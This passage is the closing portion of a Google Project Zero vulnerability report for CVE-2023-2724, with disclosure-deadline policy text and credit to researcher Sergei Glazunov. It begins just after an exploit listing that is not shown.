</script>  
</body>  
```

CREDIT INFORMATION  
Sergei Glazunov of Google Project Zero

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13.

Related CVE Numbers: CVE-2023-2724.

Found by: glazunov@google.com

Tag

#google